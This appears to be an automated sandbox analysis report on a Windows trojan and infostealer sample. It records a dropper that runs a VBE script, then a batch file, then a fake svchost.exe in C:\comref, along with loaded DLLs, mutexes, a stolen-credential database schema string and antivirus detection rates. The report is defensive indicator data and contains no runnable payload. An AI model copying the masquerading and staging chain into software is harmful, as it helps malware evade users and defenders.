Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: String function: 002FEC50 appears 56 times

Source: LMrHnriI.log.14.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: eVuUdNSS.log.14.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ThQetCXk.log.14.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: jIMTFKhG.log.14.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: ugRGgCJhQl.exe, 00000000.00000003.1238149934.0000000002678000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs ugRGgCJhQl.exe
Source: ugRGgCJhQl.exe, 00000000.00000003.1238149934.0000000002678000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs ugRGgCJhQl.exe
Source: ugRGgCJhQl.exe	Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs ugRGgCJhQl.exe

Source: ugRGgCJhQl.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: svchost.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: LMrHnriI.log.14.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: eVuUdNSS.log.14.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: ThQetCXk.log.14.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: jIMTFKhG.log.14.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: ApTjSBhc.log.14.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@9/466@0/1

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe

Code function: 0_2_002E6C74 GetLastError,FormatMessageW,

0_2_002E6C74

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe

Code function: 0_2_002FA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_002FA6C2

Source: C:\comref\svchost.exe

File created: C:\Users\user\Desktop\LMrHnriI.log

Jump to behavior

Source: C:\comref\svchost.exe	Mutant created: NULL
Source: C:\comref\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\00a407d7263350ca9f7793f96a31d0aad7843c9072ff0d1a09dfe32680f80b8d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5200:120:WilError_03

Source: C:\comref\svchost.exe

File created: C:\Users\user\AppData\Local\Temp\Wxdj6ODvaY

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\comref\dbCG2LHUCV1kAJJ.bat" "

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Command line argument: sfxname	0_2_002FDF1E
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Command line argument: sfxstime	0_2_002FDF1E
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Command line argument: STARTDLG	0_2_002FDF1E
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Command line argument: xz3	0_2_002FDF1E

Source: ugRGgCJhQl.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: ugRGgCJhQl.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\comref\svchost.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 1WY2jjUdl1.14.dr, L21sbTTxmo.14.dr, L9xikfAntt.14.dr, D1Cp9d6zuD.14.dr, XTiotNMabD.14.dr, AMXqSHCB0s.14.dr, PjI6MUHJUZ.14.dr, NXfnoTydBh.14.dr, nYudwX8gSM.14.dr, vAgN0dNWXr.14.dr, VZr7vJ0zSo.14.dr, 7HU1FRJInX.14.dr, LtLchCAi4O.14.dr, XFurddSr42.14.dr, IlNgX09QuD.14.dr, Mxj7t1e7if.14.dr, UxnVdDyGZe.14.dr, NRjtAvmiUd.14.dr, TagpmgdvsD.14.dr, iWnabsCJnr.14.dr, mOKZPBiCta.14.dr, 9gvbbcUMnO.14.dr, 4doU9r80ih.14.dr, 7xNyfuPjyQ.14.dr, lvE3a6Gu0n.14.dr, jod8OY0J2b.14.dr, hI5x53vsfQ.14.dr, pL2w5izY5m.14.dr, lf6Auv5kcP.14.dr, Y2vzc6ZVEC.14.dr, K8pnTAe2bu.14.dr, 7jIGlhSCkj.14.dr, ZKNTTtqrWX.14.dr, Q4IOgQPg2i.14.dr, iclKmVmWNH.14.dr, o0LFCQdkbf.14.dr, c7XbMfG0Wv.14.dr, 1y4JQx39Pf.14.dr, miieUuZJJv.14.dr, kfWrPVlysn.14.dr, s2krFZAl2j.14.dr, TvDJh7kSEj.14.dr, 6VZBlysEyt.14.dr, 4711XsDufK.14.dr, wSydYuohLM.14.dr, MOJJPsr9Mx.14.dr, K5H9XlnP1v.14.dr, HWBcRDH0Nl.14.dr, I8riyAvUXy.14.dr, jkA3w9Se1c.14.dr, NBT1jkkyGz.14.dr, iuOVz3fm4z.14.dr, d4iMuKFf4y.14.dr, LXvYLiTK9n.14.dr, LUAMPIdxsr.14.dr, ILFGyJrkQR.14.dr, nh3HpWjBQz.14.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: ugRGgCJhQl.exe	Virustotal: Detection: 56%
Source: ugRGgCJhQl.exe	ReversingLabs: Detection: 79%

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe

File read: C:\Users\user\Desktop\ugRGgCJhQl.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ugRGgCJhQl.exe "C:\Users\user\Desktop\ugRGgCJhQl.exe"
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\comref\POAHIjOuJ41OH.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\comref\dbCG2LHUCV1kAJJ.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\comref\svchost.exe "C:\comref/svchost.exe"
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\comref\POAHIjOuJ41OH.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\comref\dbCG2LHUCV1kAJJ.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\comref\svchost.exe "C:\comref/svchost.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\comref\svchost.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\comref\svchost.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: ugRGgCJhQl.exe

Static file information: File size 2295916 > 1048576

Source: ugRGgCJhQl.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: ugRGgCJhQl.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: ugRGgCJhQl.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: ugRGgCJhQl.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: ugRGgCJhQl.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: ugRGgCJhQl.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: ugRGgCJhQl.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: ugRGgCJhQl.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: }C:/Users/user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: iC:/Users/user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004CB9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006A94000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000044FA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.000000000539C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006628000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000005E7E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: rC:/Users/user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004877000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006455000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000005E7E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006876000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: pC:/Users/user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004877000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006A94000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: qC:/Users/user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004CB9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000052B6000.00000004.00000800.00020000.00000000.sdmp
